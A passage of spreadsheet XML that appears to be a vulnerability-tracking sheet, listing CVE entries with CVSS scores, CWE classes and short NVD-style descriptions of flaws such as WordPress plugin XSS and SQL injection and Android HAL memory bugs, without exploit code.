      <c r="F3759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3759" s="5" t="inlineStr"/>
      <c r="H3759" s="5" t="inlineStr"/>
      <c r="I3759" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3759" s="5" t="inlineStr"/>
      <c r="K3759" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3759" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder WordPress plugin before 5.9.8 does not properly validate a link URL before outputting it in an HTML attribute, relying on a filter that can be evaded, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user clicks the affected link.</t>
        </is>
      </c>
      <c r="M3759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84021</t>
        </is>
      </c>
    </row>
    <row r="3760">
      <c r="A3760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84022</t>
        </is>
      </c>
      <c r="C3760" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3760" s="5" t="inlineStr"/>
      <c r="F3760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3760" s="5" t="inlineStr"/>
      <c r="H3760" s="5" t="inlineStr"/>
      <c r="I3760" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3760" s="5" t="inlineStr"/>
      <c r="K3760" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3760" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder WordPress plugin before 5.9.8 does not sanitise and escape several shortcode attributes before outputting them in HTML attributes, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user views the affected page.</t>
        </is>
      </c>
      <c r="M3760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84022</t>
        </is>
      </c>
    </row>
    <row r="3761">
      <c r="A3761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84028</t>
        </is>
      </c>
      <c r="C3761" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3761" s="5" t="inlineStr"/>
      <c r="F3761" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3761" s="5" t="inlineStr"/>
      <c r="H3761" s="5" t="inlineStr"/>
      <c r="I3761" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3761" s="5" t="inlineStr"/>
      <c r="K3761" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3761" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder WordPress plugin before 5.9.9 does not sanitise and escape a shortcode attribute before outputting it in an HTML attribute, allowing users with the Contributor role and above to inject arbitrary web scripts that execute when a user views the affected page.</t>
        </is>
      </c>
      <c r="M3761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84028</t>
        </is>
      </c>
    </row>
    <row r="3762">
      <c r="A3762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84221</t>
        </is>
      </c>
      <c r="C3762" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3762" s="5" t="inlineStr"/>
      <c r="F3762" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3762" s="5" t="inlineStr"/>
      <c r="H3762" s="5" t="inlineStr"/>
      <c r="I3762" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3762" s="5" t="inlineStr"/>
      <c r="K3762" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3762" s="5" t="inlineStr">
        <is>
          <t>The Kirki  WordPress plugin before 6.3.0 does not escape a user-supplied identifier before using it in a SQL query, allowing users with editor-level access and above to append arbitrary SQL and read the contents of the database, including user credentials.</t>
        </is>
      </c>
      <c r="M3762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84221</t>
        </is>
      </c>
    </row>
    <row r="3763">
      <c r="A3763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84896</t>
        </is>
      </c>
      <c r="C3763" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3763" s="5" t="inlineStr"/>
      <c r="F3763" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3763" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3763" s="5" t="inlineStr"/>
      <c r="I3763" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3763" s="5" t="inlineStr"/>
      <c r="K3763" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3763" s="5" t="inlineStr">
        <is>
          <t>The King Addons for Elementor  WordPress plugin before 51.1.77 does not escape a widget display-style setting before outputting it in an HTML attribute, allowing users with Contributor-level access and above to store JavaScript that executes in the browser of any visitor to the affected page, including logged-in administrators.</t>
        </is>
      </c>
      <c r="M3763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84896</t>
        </is>
      </c>
    </row>
    <row r="3764">
      <c r="A3764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84899</t>
        </is>
      </c>
      <c r="C3764" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3764" s="5" t="inlineStr"/>
      <c r="F3764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3764" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3764" s="5" t="inlineStr"/>
      <c r="I3764" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3764" s="5" t="inlineStr"/>
      <c r="K3764" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3764" s="5" t="inlineStr">
        <is>
          <t>The VikWidgetsLoader  WordPress plugin before 1.12.0 does not sanitise or escape a block attribute before outputting it inside an inline script, allowing users with the Contributor role to store arbitrary JavaScript that executes in the browser of any user viewing the affected post, including the administrator who reviews the pending submission.</t>
        </is>
      </c>
      <c r="M3764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84899</t>
        </is>
      </c>
    </row>
    <row r="3765">
      <c r="A3765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84930</t>
        </is>
      </c>
      <c r="C3765" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3765" s="5" t="inlineStr"/>
      <c r="F3765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3765" s="5" t="inlineStr"/>
      <c r="H3765" s="5" t="inlineStr"/>
      <c r="I3765" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3765" s="5" t="inlineStr"/>
      <c r="K3765" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3765" s="5" t="inlineStr">
        <is>
          <t>The CatFolders Document Gallery &amp; PDF Library WordPress plugin before 2.0.7 does not properly validate a block attribute before using it as an HTML tag name in its gallery output, allowing users with the Author role and above to inject arbitrary web scripts that execute in the browser of anyone who views the affected post.</t>
        </is>
      </c>
      <c r="M3765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84930</t>
        </is>
      </c>
    </row>
    <row r="3766">
      <c r="A3766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84931</t>
        </is>
      </c>
      <c r="C3766" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3766" s="5" t="inlineStr"/>
      <c r="F3766" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3766" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3766" s="5" t="inlineStr"/>
      <c r="I3766" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3766" s="5" t="inlineStr"/>
      <c r="K3766" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3766" s="5" t="inlineStr">
        <is>
          <t>The Joli Table Of Contents WordPress plugin before 3.0.3 does not sanitise or escape a shortcode attribute value before outputting it inside an HTML element's attribute, allowing users with the Author role and above to inject arbitrary HTML attributes and JavaScript that execute in the browser of any user who views the post, including higher-privileged users such as administrators. This crosses a privilege boundary even on multisite, where such users are not permitted to post unfiltered HTML.</t>
        </is>
      </c>
      <c r="M3766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84931</t>
        </is>
      </c>
    </row>
    <row r="3767">
      <c r="A3767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84937</t>
        </is>
      </c>
      <c r="C3767" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3767" s="5" t="inlineStr"/>
      <c r="F3767" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3767" s="5" t="inlineStr"/>
      <c r="H3767" s="5" t="inlineStr"/>
      <c r="I3767" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3767" s="5" t="inlineStr"/>
      <c r="K3767" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3767" s="5" t="inlineStr">
        <is>
          <t>The Video Player for YouTube  WordPress plugin before 2.1.0 does not properly sanitise and escape user-supplied input before using it in a SQL statement, allowing users with the Contributor role and above to perform SQL injection attacks and read arbitrary data from the database.</t>
        </is>
      </c>
      <c r="M3767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84937</t>
        </is>
      </c>
    </row>
    <row r="3768">
      <c r="A3768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85201</t>
        </is>
      </c>
      <c r="C3768" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3768" s="5" t="inlineStr"/>
      <c r="F3768" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3768" s="5" t="inlineStr"/>
      <c r="H3768" s="5" t="inlineStr"/>
      <c r="I3768" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3768" s="5" t="inlineStr"/>
      <c r="K3768" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-789</t>
        </is>
      </c>
      <c r="L3768" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions 0.1.0 through 1.0.1, the agent does not limit the length declared by a workload in a length-delimited protobuf message received through the Control Interface FIFO. A workload granted Control Interface access can specify an excessive message length, causing an unbounded memory allocation that may abort the Ankaios agent process. This results in loss of orchestration services for workloads managed by the affected agent.</t>
        </is>
      </c>
      <c r="M3768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85201</t>
        </is>
      </c>
    </row>
    <row r="3769">
      <c r="A3769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85456</t>
        </is>
      </c>
      <c r="C3769" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3769" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3769" s="5" t="inlineStr"/>
      <c r="F3769" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3769" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3769" s="5" t="inlineStr"/>
      <c r="I3769" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3769" s="5" t="inlineStr"/>
      <c r="K3769" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3769" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 fails to properly validate variable names extracted from alog files in the SplitHandler, allowing attackers to write files outside the split directory. Attackers can supply crafted alog files with backslash sequences in variable names to escape the output directory and append to arbitrary files on Windows systems.</t>
        </is>
      </c>
      <c r="M3769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85456</t>
        </is>
      </c>
    </row>
    <row r="3770">
      <c r="A3770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85678</t>
        </is>
      </c>
      <c r="C3770" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3770" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3770" s="5" t="inlineStr"/>
      <c r="F3770" s="5" t="inlineStr"/>
      <c r="G3770" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3770" s="5" t="inlineStr"/>
      <c r="I3770" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3770" s="5" t="inlineStr"/>
      <c r="K3770" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3770" s="5" t="inlineStr">
        <is>
          <t>The AI Builder  WordPress plugin before 2.7.8 does not sanitise custom JavaScript saved against a post before echoing it inside a script tag on the front end, allowing users with contributor level access and above to store arbitrary JavaScript that will execute in the browser of anyone who views the post, including the editor or administrator who reviews it.</t>
        </is>
      </c>
      <c r="M3770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85678</t>
        </is>
      </c>
    </row>
    <row r="3771">
      <c r="A3771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86497</t>
        </is>
      </c>
      <c r="C3771" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3771" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3771" s="5" t="inlineStr"/>
      <c r="F3771" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3771" s="5" t="inlineStr"/>
      <c r="H3771" s="5" t="inlineStr"/>
      <c r="I3771" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3771" s="5" t="inlineStr"/>
      <c r="K3771" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L3771" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18769 changing a mailbox host without re-authentication allowed a project administrator to exfiltrate stored mailbox credentials</t>
        </is>
      </c>
      <c r="M3771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86497</t>
        </is>
      </c>
    </row>
    <row r="3772">
      <c r="A3772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86780</t>
        </is>
      </c>
      <c r="C3772" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3772" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3772" s="5" t="inlineStr"/>
      <c r="F3772" s="5" t="inlineStr"/>
      <c r="G3772" s="5" t="inlineStr"/>
      <c r="H3772" s="5" t="inlineStr"/>
      <c r="I3772" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3772" s="5" t="inlineStr"/>
      <c r="K3772" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3772" s="5" t="inlineStr">
        <is>
          <t>The Featured Image with URL WordPress plugin before 1.0.6 does not sanitise and escape a stored image attribute value before outputting it, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks that execute in the browser of any user viewing the affected post, including higher-privileged users such as Editors and Administrators.</t>
        </is>
      </c>
      <c r="M3772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86780</t>
        </is>
      </c>
    </row>
    <row r="3773">
      <c r="A3773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87015</t>
        </is>
      </c>
      <c r="C3773" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3773" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3773" s="5" t="inlineStr"/>
      <c r="F3773" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3773" s="5" t="inlineStr"/>
      <c r="H3773" s="5" t="inlineStr"/>
      <c r="I3773" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3773" s="5" t="inlineStr"/>
      <c r="K3773" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L3773" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.6.27 until 0.11.1, backend/open_webui/utils/tools.py captured a cookie jar from the enclosing connection loop instead of binding it to each external tool callable. When multiple tool servers were attached and a session or system OAuth connection was processed last, a request to a different server configured for bearer authentication could include the calling user's Open WebUI session cookies, allowing that server's operator to reuse the session and take over the account. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M3773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87015</t>
        </is>
      </c>
    </row>
    <row r="3774">
      <c r="A3774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87872</t>
        </is>
      </c>
      <c r="C3774" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3774" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3774" s="5" t="inlineStr"/>
      <c r="F3774" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3774" s="5" t="inlineStr"/>
      <c r="H3774" s="5" t="inlineStr"/>
      <c r="I3774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3774" s="5" t="inlineStr"/>
      <c r="K3774" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L3774" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the OCAPI modules (ocapi_command, ocapi_info) of the
community.general Ansible collection. The shared OCAPI request helper disables
TLS certificate validation on every request and the modules expose no parameter
to re-enable it, while sending HTTP Basic-Auth credentials to an https endpoint.
An attacker positioned on the network path between the Ansible controller and the
OCAPI-managed storage/enclosure device can present any certificate, intercept the
session, capture the credentials, and tamper with responses.</t>
        </is>
      </c>
      <c r="M3774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87872</t>
        </is>
      </c>
    </row>
    <row r="3775">
      <c r="A3775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20506</t>
        </is>
      </c>
      <c r="C3775" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3775" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3775" s="5" t="inlineStr"/>
      <c r="F3775" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3775" s="5" t="inlineStr"/>
      <c r="H3775" s="5" t="inlineStr"/>
      <c r="I3775" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3775" s="5" t="inlineStr"/>
      <c r="K3775" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3775" s="5" t="inlineStr">
        <is>
          <t>In Audio HAL, there is a possible escalation of privilege due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11191981; Issue ID: MSV-9126.</t>
        </is>
      </c>
      <c r="M3775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20506</t>
        </is>
      </c>
    </row>
    <row r="3776">
      <c r="A3776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20507</t>
        </is>
      </c>
      <c r="C3776" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3776" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3776" s="5" t="inlineStr"/>
      <c r="F3776" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3776" s="5" t="inlineStr"/>
      <c r="H3776" s="5" t="inlineStr"/>
      <c r="I3776" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3776" s="5" t="inlineStr"/>
      <c r="K3776" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3776" s="5" t="inlineStr">
        <is>
          <t>In Audio HAL, there is a possible escalation of privilege due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11191981; Issue ID: MSV-9125.</t>
        </is>
      </c>
      <c r="M3776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20507</t>
        </is>
      </c>
    </row>
    <row r="3777">
      <c r="A3777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20508</t>
        </is>
      </c>
      <c r="C3777" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3777" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3777" s="5" t="inlineStr"/>
      <c r="F3777" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3777" s="5" t="inlineStr"/>
      <c r="H3777" s="5" t="inlineStr"/>
      <c r="I3777" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3777" s="5" t="inlineStr"/>
      <c r="K3777" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L3777" s="5" t="inlineStr">
        <is>
          <t>In Power HAL, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11165543; Issue ID: MSV-9012.</t>
        </is>
      </c>
      <c r="M3777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20508</t>
        </is>
      </c>
    </row>
    <row r="3778">
      <c r="A3778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20509</t>
        </is>
      </c>
      <c r="C3778" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3778" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3778" s="5" t="inlineStr"/>
      <c r="F3778" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3778" s="5" t="inlineStr"/>
      <c r="H3778" s="5" t="inlineStr"/>
      <c r="I3778" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3778" s="5" t="inlineStr"/>
      <c r="K3778" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3778" s="5" t="inlineStr">
        <is>
          <t>In Power HAL, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11165543; Issue ID: MSV-9011.</t>
        </is>
      </c>
      <c r="M3778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20509</t>
        </is>
      </c>
    </row>
    <row r="3779">
      <c r="A3779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20510</t>
        </is>
      </c>
      <c r="C3779" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3779" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3779" s="5" t="inlineStr"/>
      <c r="F3779" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3779" s="5" t="inlineStr"/>
      <c r="H3779" s="5" t="inlineStr"/>
      <c r="I3779" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3779" s="5" t="inlineStr"/>
      <c r="K3779" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3779" s="5" t="inlineStr">
        <is>
          <t>In camera middleware, there is a possible escalation of privilege due to double free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11134622; Issue ID: MSV-8894.</t>
        </is>
      </c>
      <c r="M3779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20510</t>
        </is>
      </c>
    </row>
    <row r="3780">
      <c r="A3780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20511</t>
        </is>
      </c>
      <c r="C3780" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3780" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3780" s="5" t="inlineStr"/>
      <c r="F3780" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3780" s="5" t="inlineStr"/>
      <c r="H3780" s="5" t="inlineStr"/>
      <c r="I3780" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3780" s="5" t="inlineStr"/>
      <c r="K3780" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3780" s="5" t="inlineStr">
        <is>
          <t>In SurfaceFlinger, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11123860; Issue ID: MSV-8890.</t>
        </is>
      </c>
      <c r="M3780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20511</t>
        </is>
      </c>
    </row>
    <row r="3781">
      <c r="A3781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20512</t>
        </is>
      </c>
      <c r="C3781" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D3781" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3781" s="5" t="inlineStr"/>
      <c r="F3781" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3781" s="5" t="inlineStr"/>
      <c r="H3781" s="5" t="inlineStr"/>
      <c r="I3781" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3781" s="5" t="inlineStr"/>
      <c r="K3781" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
